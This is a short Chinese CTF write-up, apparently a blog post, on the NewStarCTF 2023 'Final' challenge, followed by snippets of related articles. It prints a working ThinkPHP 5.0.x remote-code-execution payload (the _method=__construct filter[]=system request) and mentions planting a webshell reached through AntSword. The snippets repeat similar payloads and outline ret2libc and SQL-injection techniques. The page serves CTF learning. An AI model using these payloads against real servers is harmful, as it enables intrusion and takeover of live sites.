每周一练--[NewStarCTF 2023 公开赛道]Final

最新推荐文章于 2025-09-04 15:07:43 发布
原创 最新推荐文章于 2025-09-04 15:07:43 发布 · 790 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #web安全

很明显又是ThinkPHP的漏洞,上周还做过类似的。

先看看是哪一个版本的。

得到版号后,去找找payload。

(post)public/index.php?s=captcha

(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

这其中filter[]=接要执行的命令,server[REQUEST_METHOD]=这个后面接命令的参数。(我试了一下,似乎是数字就行)

因为禁用了system,所以我们改用echo。

如图,成功用蚁剑连接上。

最低0.47元/天 解锁文章

新学期VIP享超值加赠
[NewStarCTF 2023 公开赛]ret2libc(BUUCTF)
Welcome To Myon'Blog !
05-22 461
本文描述了一个典型的ret2libc漏洞利用过程。首先,通过IDA反编译发现main函数中的read函数存在溢出漏洞,但程序中没有直接提供/bin/sh字符串和system函数。通过puts函数泄露libc基址,进而计算system函数和/bin/sh字符串的地址。利用gadget构造payload,首先通过puts泄露地址,然后再次发送payload调用system函数执行/bin/sh,最终成功获取flag。整个过程展示了如何在没有直接提供libc文件的情况下,通过泄露地址和计算偏移来实现漏洞利用。
NewStarCTF 2023 公开赛 Week1
2401_84519960的博客
05-17 637
然后导出HTTP对象文件直接全部开导,保存到一个文件夹里然后发现了这个有点像flag的文件名打开之后发现是一串base加密后的密文,那么将它解密即可,是两层base64。
【BUU】[NewStarCTF 2023 公开赛]Final -CP读取文件内容
SwBack的博客
08-15 525
利用cp命令读取700权限文件内容
NewStarCTF2023
2301_80115097的博客
11-13 4660
从Begin的__destruct析构函数作为起点开始,构造POP链触发到WhiteGod的__unset方法,__unset方法中存在一个函数的动态调用,可以实现RCE。由此可以得到剩下的两个信息,index.php文件的page参数存在任意文件包含漏洞,攻击者通过这个漏洞包含pearcmd.php向服务器中写入了名为wh1t3g0d.php的WebShell。发第一个,有回显,第二个,没回显,说明页面可以根据if判断的结果回显两种(真假)内容,因此是布尔盲注。
NewStarCTF 2023 公开赛 Web
m0_73728268的博客
11-05 5275
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
NewStarCTF 2022 公开赛-WEEK1|REVERSE
qq_61774705的博客
10-07 2716
合起来就是:.flag{h3llo_rvers1ng_w0rld}加密思路就是:先把输入先base64编码->再异或字符串。解密思路就是:异或字符串->base64解码。
NewStarCTF 2023 第一阶段公开赛部分wp
10-02
这是官方的wp文件,需要的可以下载查看
2024青少年ctf擂台挑战赛round1-CTFer Revenge
weixin_71656576的博客
03-01 515
先将每行反转,工具地址:https://www.lddgo.net/string/text-reverse。再写了个C++脚本提取十六进制数据,从尾倒头输出。我是从4位开始试的,然后到6位才解出来。根据提示进行爆破,小写字母和数字。所以从头到尾输出一遍就好了。拿到源文件观察,是反着的。导入010导出zip文件。
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 2785
cookie 修改admin 源码发现key GET和POST传参即可。
【无标题】
meccke的博客
06-03 870
下载,ida32位打开sub_401042函数中发现smc通过该脚本复原代码(注意缩进,直接复制到代码没有缩进,怪事)修改之后依次选中函数,按c和p分析出新的函数反编译一下简单的异或!R1ght?
[BJDCTF 2nd]old-hack ctf
wuyaowangchuan的博客
11-09 258
[BJDCTF 2nd]old-hack 告诉了我们是THINKPHP5的漏洞 搜这个版本的漏洞 发现是thinkphp5.0.23的命令执行 THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / _method=__construct&
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 290
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
学习笔记-ThinkPHP总结
人饭子的博客
11-09 852
介绍:这是一篇tp的漏洞总结,以及一些自己遇到过或思考过的tricks, 查找漏洞建议直接页面搜索版本号,例如这些关键字:5.1、5.0、3.2 问题:如何判断TP版本? 黑盒 构造请求错误,如果目标错误管理不规范就可能显示tp版本信息 请求App/Runtime/Logs/Home/22_05_12.log当天日志(tp3) 请求runtime/log/202205/12.log当天...
thinkphp5.X漏洞利用EXP
Websec
05-17 2525
thinkphp5最出名的就是rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&conte
ThinkPHP 5.0 * 远程代码执行漏洞分析
热门推荐
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
ThinkPHP 5.x RCE 漏洞分析与利用总结
dengzhasong7076的博客
01-21 5120
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。 例如: 1、大部分payload进入最后rce的函数是调用了call_user_func,其...
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1660
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP5.0.23 远程代码执行漏洞
cyzCc的博客
02-15 5739
靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031 提示:flag在服务器根目录 直接在kali里面搜索ThinkPHP5.0.23相关漏洞 发现了 Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 在最下面发现该版本payload (post)public/index.php?s=captcha (data) ...
9.4 动态路由协议
最新发布
2301_81476026的博客
09-04 531
​:表示路由协议的优先级,数值越小越优先。​。
[NewStarCTF 2023 公开赛]midsql 1
07-15
我们被要求生成一个关于NewStarCTF 2023 midsql题目的解答。根据引用[3]中提到的内容,有一题目可以通过sqlmap直接注入获取flag。但是,具体到midsql,我们需要更多的信息。然而,用户没有提供具体的题目描述,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值